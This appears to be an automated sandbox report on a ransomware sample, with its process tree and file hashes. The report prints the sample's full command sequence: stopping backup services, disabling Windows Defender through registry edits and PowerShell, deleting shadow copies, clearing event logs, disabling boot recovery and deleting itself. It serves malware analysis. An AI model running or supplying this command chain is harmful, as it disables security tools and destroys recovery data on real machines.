wrote to memory of 1224 2512 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe sc.exe PID 2512 wrote to memory of 4012 2512 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe sc.exe PID 2512 wrote to memory of 4012 2512 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe sc.exe PID 2512 wrote to memory of 1376 2512 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe sc.exe PID 2512 wrote to memory of 1376 2512 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe sc.exe PID 2512 wrote to memory of 1656 2512 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe sc.exe PID 2512 wrote to memory of 1656 2512 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe sc.exe PID 2512 wrote to memory of 2024 2512 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe sc.exe PID 2512 wrote to memory of 2024 2512 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe sc.exe PID 2512 wrote to memory of 1980 2512 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe sc.exe PID 2512 wrote to memory of 1980 2512 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe sc.exe PID 2512 wrote to memory of 2200 2512 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe reg.exe PID 2512 wrote to memory of 2200 2512 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe reg.exe PID 2512 wrote to memory of 3940 2512 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe reg.exe PID 2512 wrote to memory of 3940 2512 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe reg.exe PID 2512 wrote to memory of 3232 2512 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe reg.exe PID 2512 wrote to memory of 3232 2512 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe reg.exe PID 2512 wrote to memory of 352 2512 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe reg.exe PID 2512 wrote to memory of 352 2512 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe reg.exe PID 2512 wrote to memory of 1272 2512 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe reg.exe PID 2512 wrote to memory of 1272 2512 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe"C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2512 -
C:\Windows\SYSTEM32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3704 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:3280
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1524 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:1296
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:572 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:1164
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2360 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:2088
-
C:\Windows\SYSTEM32\net.exenet.exe stop "vmicvss" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2248 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicvss" /y3⤵PID:3680
-
C:\Windows\SYSTEM32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3336 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:4036
-
C:\Windows\SYSTEM32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:840 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:2572
-
C:\Windows\SYSTEM32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1416 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:584
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UnistoreSvc_1323b" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2528 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UnistoreSvc_1323b" /y3⤵PID:2552
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:1668
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:2236
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:1320
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:1224
-
C:\Windows\SYSTEM32\sc.exesc.exe config "vmicvss" start= disabled2⤵PID:4012
-
C:\Windows\SYSTEM32\sc.exesc.exe config "VSS" start= disabled2⤵PID:1376
-
C:\Windows\SYSTEM32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:1656
-
C:\Windows\SYSTEM32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:2024
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UnistoreSvc_1323b" start= disabled2⤵PID:1980
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2200
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:3940
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:3232
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:352
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:1272
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:2096
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:3672
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:3688
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:3588
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:2040
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:896
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:3048
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:3864
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:3684
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:3900
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1164
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:788
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:1540
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:1824
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:3312
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:3676
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:380
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:748
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:868
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:1088 -
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:3564 -
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:3976 -
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2592
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1784
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2128
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3004
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:2872 -
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1640
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:3180 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3692 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3580 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1800 -
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1480 -
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3116 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:988 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:568 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:3496
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:3516 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:944
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2820 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:3788
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3904 -
C:\Windows\SYSTEM32\notepad.exenotepad.exe C:\n8pw_HOW_TO_DECRYPT.txt2⤵
- Opens file in notepad (likely ransom note)
PID:3160 -
C:\Windows\SYSTEM32\cmd.execmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe"2⤵PID:3548
-
C:\Windows\system32\PING.EXEping.exe -n 5 127.0.0.13⤵
- Runs ping.exe
PID:3776
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
8592ba100a78835a6b94d5949e13dfc1
SHA163e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA51287f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
MD5
68311e554f61eb47783d489b1dabc7eb
SHA13397ee99dc13e75d1322cd0d8f277056d571a438
SHA256db82f980256350fa8507fc22e10d5e5afb5a0cd69d8e9ff917849ef6a501ded8
SHA512d924fa8613b31491592fc7cbe29aded8cdf211b6f64ec702265b38d0cd67c889672275370665c9c2c01e9ebab5cac68cd8fec4a9d058a7f4bfbb0b4dbfc797d1